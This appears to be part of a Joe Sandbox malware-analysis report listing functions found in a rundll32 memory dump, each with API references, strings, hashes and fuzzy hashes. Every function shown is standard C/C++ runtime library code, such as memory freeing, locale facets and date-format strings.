Function 000001E51AE1B0E0 Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32 ref: 000001E51AE1B0F1
free.LIBCMT ref: 000001E51AE1B10E

Part of subcall function 000001E51AE11E24: HeapFree.KERNEL32 ref: 000001E51AE11E3A
Part of subcall function 000001E51AE11E24: _errno.LIBCMT ref: 000001E51AE11E44
Part of subcall function 000001E51AE11E24: GetLastError.KERNEL32 ref: 000001E51AE11E4C

free.LIBCMT ref: 000001E51AE1B123
free.LIBCMT ref: 000001E51AE1B144
free.LIBCMT ref: 000001E51AE1B159
free.LIBCMT ref: 000001E51AE1B16D
free.LIBCMT ref: 000001E51AE1B179
free.LIBCMT ref: 000001E51AE1B1A4
EncodePointer.KERNEL32 ref: 000001E51AE1B1AC
free.LIBCMT ref: 000001E51AE1B1C5
free.LIBCMT ref: 000001E51AE1B1DE
free.LIBCMT ref: 000001E51AE1B20F

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
String ID:
API String ID: 4099253644-0
Opcode ID: b4bc968d3c6e0ca3411d4d7c887ffc2f2a0207fe4ca6a95d778c9ae964d27bd5
Instruction ID: be5c3d45c93af1ead45e9274bf5e28ead5a38f98ed3f0fb2119b1fc913231685
Opcode Fuzzy Hash: b4bc968d3c6e0ca3411d4d7c887ffc2f2a0207fe4ca6a95d778c9ae964d27bd5
Instruction Fuzzy Hash: B331C531249ED085FF579B61E8657EC23E3AB84B9CF091729DD1A4A2E7DF2CC8448611

Function 000001E51AE02F0C Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 326COMMON

Download Yara Rule

APIs

std::ios_base::getloc.LIBCPMTD ref: 000001E51AE02F48

Part of subcall function 000001E51ADE3F40: std::locale::locale.LIBCPMTD ref: 000001E51ADE3F64

Part of subcall function 000001E51ADF2EB4: std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF2ED5
Part of subcall function 000001E51ADF2EB4: std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF2EFA
Part of subcall function 000001E51ADF2EB4: std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF2F24
Part of subcall function 000001E51ADF2EB4: std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF2FCE

Strings

%d / %m / %y, xrefs: 000001E51AE033B1
%m / %d / %y, xrefs: 000001E51AE0304D
%H : %M, xrefs: 000001E51AE030B2
c, xrefs: 000001E51AE0337B
:AM:am:PM:pm, xrefs: 000001E51AE03403
%b %d %H : %M : %S %Y, xrefs: 000001E51AE032A4
%H : %M : S, xrefs: 000001E51AE03156
%I : %M : %S %p, xrefs: 000001E51AE033F3

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$std::ios_base::getlocstd::locale::locale
String ID: %H : %M$%H : %M : S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm$c
API String ID: 824625536-3998755201
Opcode ID: 9ea7233a1195fdad9958adce2f8bb786a2981300ba8746fa4110a12b4cbdb550
Instruction ID: 53d67a321fec3edf2d78901f37eec5b49f6783060fbea29ae0ae2b961baaf701
Opcode Fuzzy Hash: 9ea7233a1195fdad9958adce2f8bb786a2981300ba8746fa4110a12b4cbdb550
Instruction Fuzzy Hash: DFE18E32608FC687EB668F28E5407EE77E2F78978CF544215EE8917A5ADB38C645C700

Function 000001E51AE0346C Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 326COMMON

Download Yara Rule

APIs

std::ios_base::getloc.LIBCPMTD ref: 000001E51AE034A8

Part of subcall function 000001E51ADE3F40: std::locale::locale.LIBCPMTD ref: 000001E51ADE3F64

Part of subcall function 000001E51ADEABE0: std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADEABF9
Part of subcall function 000001E51ADEABE0: __int64.LIBCPMTD ref: 000001E51ADEAC12
Part of subcall function 000001E51ADEABE0: std::locale::_Getfacet.LIBCPMTD ref: 000001E51ADEAC29
Part of subcall function 000001E51ADEABE0: std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADEACDA

Strings

%d / %m / %y, xrefs: 000001E51AE03911
%m / %d / %y, xrefs: 000001E51AE035AD
%H : %M, xrefs: 000001E51AE03612
c, xrefs: 000001E51AE038DB
:AM:am:PM:pm, xrefs: 000001E51AE03963
%b %d %H : %M : %S %Y, xrefs: 000001E51AE03804
%H : %M : S, xrefs: 000001E51AE036B6
%I : %M : %S %p, xrefs: 000001E51AE03953

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: Lockitstd::_$GetfacetLockit::_Lockit::~___int64std::ios_base::getlocstd::locale::_std::locale::locale
String ID: %H : %M$%H : %M : S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm$c
API String ID: 4021809434-3998755201
Opcode ID: 8e1deff4405f140ca104af93d567ca82f55d7d783d531e69af03a14ea99d4600
Instruction ID: 2ff6ecd070b41ca0ffc248ffd871ee0ed04f52d5f17c02642dc99bb088afd129
Opcode Fuzzy Hash: 8e1deff4405f140ca104af93d567ca82f55d7d783d531e69af03a14ea99d4600
Instruction Fuzzy Hash: 76E15F32608FC686EB668F24E5447EE77E2F78978CF544205EE8947B9ADB38C645C700

Function 000001E51AE0BC38 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 326COMMON

Download Yara Rule

APIs

std::ios_base::getloc.LIBCPMTD ref: 000001E51AE0BC74

Part of subcall function 000001E51ADE3F40: std::locale::locale.LIBCPMTD ref: 000001E51ADE3F64

Part of subcall function 000001E51ADEC674: std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADEC695
Part of subcall function 000001E51ADEC674: std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADEC6BA
Part of subcall function 000001E51ADEC674: std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADEC6E4
Part of subcall function 000001E51ADEC674: std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADEC78E

Strings

%d / %m / %y, xrefs: 000001E51AE0C0DD
%m / %d / %y, xrefs: 000001E51AE0BD79
%H : %M, xrefs: 000001E51AE0BDDE
c, xrefs: 000001E51AE0C0A7
:AM:am:PM:pm, xrefs: 000001E51AE0C12F
%b %d %H : %M : %S %Y, xrefs: 000001E51AE0BFD0
%H : %M : S, xrefs: 000001E51AE0BE82
%I : %M : %S %p, xrefs: 000001E51AE0C11F

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$std::ios_base::getlocstd::locale::locale
String ID: %H : %M$%H : %M : S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm$c
API String ID: 824625536-3998755201
Opcode ID: c37271404475d0014721bef1fed1c0e1cecc04706b38c11d20b1fc59747c924a
Instruction ID: 7a7c4b6548e3f95e667319202f22d4f3bdb2eb131e9d6c290fb634cdf4377989
Opcode Fuzzy Hash: c37271404475d0014721bef1fed1c0e1cecc04706b38c11d20b1fc59747c924a
Instruction Fuzzy Hash: E1E17C32608FC586EB668F24E5407ED77E2F795B8CF144205EE8947A9ADB38C655CB00

Function 000001E51ADF2FE4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF3005

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF302A
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF3054
messages.LIBCPMT ref: 000001E51ADF30AD
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADF30C4
_CxxThrowException.LIBCMT ref: 000001E51ADF30D5
std::_Facet_Register.LIBCPMT ref: 000001E51ADF30F3
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF30FE

Strings

bad cast, xrefs: 000001E51ADF30B8

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 662288457-3145022300
Opcode ID: b569cdc1653f4c7f6180cbb6e0faa1c39ac808a66fab2fc048e17dcba9d08f51
Instruction ID: ef1ce01d84431544c61e48b24e91a3c862e7f9a77a03c55e891a50158dd642da
Opcode Fuzzy Hash: b569cdc1653f4c7f6180cbb6e0faa1c39ac808a66fab2fc048e17dcba9d08f51
Instruction Fuzzy Hash: 5C310E32648F8091EB16DF25E8503DE67E2E794BA8F554322DE69476EBDE38C486C700

Function 000001E51ADF3F54 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF3F75

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF3F9A
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF3FC4
messages.LIBCPMT ref: 000001E51ADF401D
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADF4034
_CxxThrowException.LIBCMT ref: 000001E51ADF4045
std::_Facet_Register.LIBCPMT ref: 000001E51ADF4063
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF406E

Strings

bad cast, xrefs: 000001E51ADF4028

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 662288457-3145022300
Opcode ID: e44b50d4e94eb0d1351846dbd8529780eaeaffd3bd116e536ad6d8b979878f95
Instruction ID: 54c6bc4209b9693de707002d757e24c156e7d91d8b558853ab2dc98e42c0f64d
Opcode Fuzzy Hash: e44b50d4e94eb0d1351846dbd8529780eaeaffd3bd116e536ad6d8b979878f95
Instruction Fuzzy Hash: B0311272208F8091EB16DB65E4507DE67E2F794BA8F584322DE6D476EBDE38C486C700

Function 000001E51ADF3114 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF3135

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF315A
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF3184
messages.LIBCPMT ref: 000001E51ADF31DD
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADF31F4
_CxxThrowException.LIBCMT ref: 000001E51ADF3205
std::_Facet_Register.LIBCPMT ref: 000001E51ADF3223
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF322E

Strings

bad cast, xrefs: 000001E51ADF31E8

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 662288457-3145022300
Opcode ID: ad4db0a7af812267d7f8cad6930e3dc199e4210e7b6ad20d02838aa8ea755007
Instruction ID: 43c76efb6365255fe1b20e1bb04544cea12e26bfad69913d305ebe62f5baeb13
Opcode Fuzzy Hash: ad4db0a7af812267d7f8cad6930e3dc199e4210e7b6ad20d02838aa8ea755007
Instruction Fuzzy Hash: 99311271608F8091FF169B25E8403DE67E2F794BA8F594322DE69476EBDE38C486C700

Function 000001E51AE08108 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51AE08129

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51AE0814E
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51AE08178
collate.LIBCPMT ref: 000001E51AE081D1
std::bad_exception::bad_exception.LIBCMT ref: 000001E51AE081E8
_CxxThrowException.LIBCMT ref: 000001E51AE081F9
std::_Facet_Register.LIBCPMT ref: 000001E51AE08217
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51AE08222

Strings

bad cast, xrefs: 000001E51AE081DC

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockcollatestd::bad_exception::bad_exception
String ID: bad cast
API String ID: 4217240666-3145022300
Opcode ID: 4b7540098f8ea2fd8cb3a6c4dc7befb07f8a31645b2c4940871eb245c6e3b5b3
Instruction ID: 6266319702249cfc9912edac9b909395d011743b2e4a413fe2034c0a52a3bf9a
Opcode Fuzzy Hash: 4b7540098f8ea2fd8cb3a6c4dc7befb07f8a31645b2c4940871eb245c6e3b5b3
Instruction Fuzzy Hash: 2B312C32208F8092EB139B65E9403DD77E2EBA4BA8F544322DE59476EBDE34C4868740

Function 000001E51ADF4084 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF40A5

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF40CA
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF40F4
numpunct.LIBCPMT ref: 000001E51ADF414D
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADF4164
_CxxThrowException.LIBCMT ref: 000001E51ADF4175
std::_Facet_Register.LIBCPMT ref: 000001E51ADF4193
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF419E

Strings

bad cast, xrefs: 000001E51ADF4158

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_locknumpunctstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 4059195664-3145022300
Opcode ID: d94e50aa53ccc9d6944cd3aed90cdf3e84a64a3bd5255cb9728456337b3ddaed
Instruction ID: 55cd79c82478ff446f884a3123ead0d047c985b0f9a33e113d50b3a21735d8c4
Opcode Fuzzy Hash: d94e50aa53ccc9d6944cd3aed90cdf3e84a64a3bd5255cb9728456337b3ddaed
Instruction Fuzzy Hash: 4C311F72248F8091EF26DB25E8503DE67E2E794BA8F544322DE59476EBDE78C486C700

Function 000001E51ADF3E24 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF3E45

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF3E6A
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF3E94
messages.LIBCPMT ref: 000001E51ADF3EED
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADF3F04
_CxxThrowException.LIBCMT ref: 000001E51ADF3F15
std::_Facet_Register.LIBCPMT ref: 000001E51ADF3F33
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF3F3E

Strings

bad cast, xrefs: 000001E51ADF3EF8

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 662288457-3145022300
Opcode ID: 48616abfac1a981897439173c93a6e5aaf7991275bd66df3e03a16717abd7810
Instruction ID: 5d0acff78c6e3a174cf28a586fe4f6f380ab9fdb896a40c84fad1b878465a0c9
Opcode Fuzzy Hash: 48616abfac1a981897439173c93a6e5aaf7991275bd66df3e03a16717abd7810
Instruction Fuzzy Hash: 3F315231608FC091EB179B25E8403DE67E2F794BA8F554321DE69076EBDE78C886C700

Function 000001E51ADF2D84 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF2DA5

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF2DCA
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF2DF4
collate.LIBCPMT ref: 000001E51ADF2E4D
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADF2E64
_CxxThrowException.LIBCMT ref: 000001E51ADF2E75
std::_Facet_Register.LIBCPMT ref: 000001E51ADF2E93
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF2E9E

Strings

bad cast, xrefs: 000001E51ADF2E58

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockcollatestd::bad_exception::bad_exception
String ID: bad cast
API String ID: 4217240666-3145022300
Opcode ID: 1ff498fc3fba5fdf49fdedaaaf28a20aa44f259ac781903afc3c6c16cf0d7928
Instruction ID: 02814eb630807eff529af449dbdc90ad42dae87512d308574730c4234eee1486
Opcode Fuzzy Hash: 1ff498fc3fba5fdf49fdedaaaf28a20aa44f259ac781903afc3c6c16cf0d7928
Instruction Fuzzy Hash: 8D310E76208F8091EB169B25E4503DE67E6F794BA8F544322DE59476EFDE38C8468700

Function 000001E51ADF2EB4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF2ED5

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF2EFA
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF2F24
ctype.LIBCPMT ref: 000001E51ADF2F7D
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADF2F94
_CxxThrowException.LIBCMT ref: 000001E51ADF2FA5
std::_Facet_Register.LIBCPMT ref: 000001E51ADF2FC3
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF2FCE

Strings

bad cast, xrefs: 000001E51ADF2F88

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockctypestd::bad_exception::bad_exception
String ID: bad cast
API String ID: 757613215-3145022300
Opcode ID: 27ff36a41daa2afd465fce565ffe5753e683ad286d1df17b1f83c21b9b33a9ce
Instruction ID: d1f630a196ebefa87ded595e76f13871a030a7065632c8fc193c66e1bfa57ac8
Opcode Fuzzy Hash: 27ff36a41daa2afd465fce565ffe5753e683ad286d1df17b1f83c21b9b33a9ce
Instruction Fuzzy Hash: 13313232218F8091EB16DB66E4503DE67E2F794BA8F544322DE5A476EBDF38C546CB00

Function 000001E51AE08368 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51AE08389

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51AE083AE
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51AE083D8
messages.LIBCPMT ref: 000001E51AE08431
std::bad_exception::bad_exception.LIBCMT ref: 000001E51AE08448
_CxxThrowException.LIBCMT ref: 000001E51AE08459
std::_Facet_Register.LIBCPMT ref: 000001E51AE08477
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51AE08482

Strings

bad cast, xrefs: 000001E51AE0843C

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 662288457-3145022300
Opcode ID: 5a55c19257780c8c169a156cca45b48a9cb7959a6ebe7d38ac67adaa113ab4e8
Instruction ID: a238f66860fb1a6dd20de5332a8c88553e4581fdf4740c66981fddf103b1c2c1
Opcode Fuzzy Hash: 5a55c19257780c8c169a156cca45b48a9cb7959a6ebe7d38ac67adaa113ab4e8
Instruction Fuzzy Hash: EC313E32708F8082EB179B25E5407DD77E2E794BA8F544322DE69476EBDE38C8858710

Function 000001E51ADF3374 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF3395

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF33BA
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF33E4
messages.LIBCPMT ref: 000001E51ADF343D
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADF3454
_CxxThrowException.LIBCMT ref: 000001E51ADF3465
std::_Facet_Register.LIBCPMT ref: 000001E51ADF3483
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF348E

Strings

bad cast, xrefs: 000001E51ADF3448

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 662288457-3145022300
Opcode ID: c69e9b5502f2b5cb16499cf93693c14af8bc71d40f19607121fcaa26e48801a2
Instruction ID: 6061772ef83c2a1733d89a7a25dda144811e7dc19a1bf7b25b06873398df8d68
Opcode Fuzzy Hash: c69e9b5502f2b5cb16499cf93693c14af8bc71d40f19607121fcaa26e48801a2
Instruction Fuzzy Hash: 8C311D32208E8081EB179B65E8403DE67E2E794BA8F954322DE69476EBDE78C446C700

Function 000001E51ADEC544 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADEC565

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADEC58A
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADEC5B4
messages.LIBCPMT ref: 000001E51ADEC60D
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADEC624
_CxxThrowException.LIBCMT ref: 000001E51ADEC635
std::_Facet_Register.LIBCPMT ref: 000001E51ADEC653
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADEC65E

Strings

bad cast, xrefs: 000001E51ADEC618

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 662288457-3145022300
Opcode ID: ce52fca3fe3199b9ca64d09fb7b68cda433c6417c830918da4d940205a12b32f
Instruction ID: ebb680ea70ff3bcc75925b0f1d4edadca1d0ea3a9f9f1dae6dd3dfe495d09aef
Opcode Fuzzy Hash: ce52fca3fe3199b9ca64d09fb7b68cda433c6417c830918da4d940205a12b32f
Instruction Fuzzy Hash: CE313232208FC091EB179B29E4403EE67E2E794BA8F545322DE69476EBDE34C4868740

Function 000001E51ADF34A4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF34C5

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF34EA
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF3514
messages.LIBCPMT ref: 000001E51ADF356D
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADF3584
_CxxThrowException.LIBCMT ref: 000001E51ADF3595
std::_Facet_Register.LIBCPMT ref: 000001E51ADF35B3
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF35BE

Strings

bad cast, xrefs: 000001E51ADF3578

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 662288457-3145022300
